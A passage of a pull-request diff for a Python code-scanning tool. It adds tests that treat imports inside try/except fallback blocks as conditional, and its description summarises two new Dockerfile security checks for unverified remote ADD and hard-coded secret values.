+    assert "SKY-D343" not in _rule_ids(findings)
+
+
 def test_config_scanner_routes_dockerfile(tmp_path: Path):
     dockerfile = tmp_path / "Dockerfile"
     dockerfile.write_text(

--- a/test/test_visitor.py
+++ b/test/test_visitor.py
@@ -145,6 +145,32 @@ except ImportError:
         self.assertTrue(imports[0].conditional_import)
         self.assertTrue(imports[0].to_dict()["conditional_import"])
 
+    def test_try_except_tuple_import_marks_conditional_import(self):
+        code = """
+try:
+    import brotli
+except (ImportError, ModuleNotFoundError):
+    brotli = None
+"""
+        visitor = self.parse_and_visit(code)
+
+        imports = [d for d in visitor.defs if d.type == "import"]
+        self.assertEqual(len(imports), 1)
+        self.assertTrue(imports[0].conditional_import)
+
+    def test_try_star_import_marks_conditional_import(self):
+        code = """
+try:
+    import brotli
+except* ImportError:
+    brotli = None
+"""
+        visitor = self.parse_and_visit(code)
+
+        imports = [d for d in visitor.defs if d.type == "import"]
+        self.assertEqual(len(imports), 1)
+        self.assertTrue(imports[0].conditional_import)
+
     def test_class_with_methods(self):
         code = """
 class MyClass:


### PR DESCRIPTION
## Summary

  - Recognize optional import fallback patterns, including tuple `except (ImportError, ModuleNotFoundError)` handlers and `except* ImportError`.
  - Add Dockerfile security checks for:
    - `SKY-D342`: remote `ADD` without checksum
    - `SKY-D343`: literal secret-looking `ARG` / `ENV` values

  ## Tests

  - `pytest test/test_dockerfile_security.py`
  - `pytest test/test_shell_security.py test/test_dockerfile_security.py test/test_github_actions_security.py test/test_gitlab_ci_security.py test/test_rules_cmd.py test/test_config.py`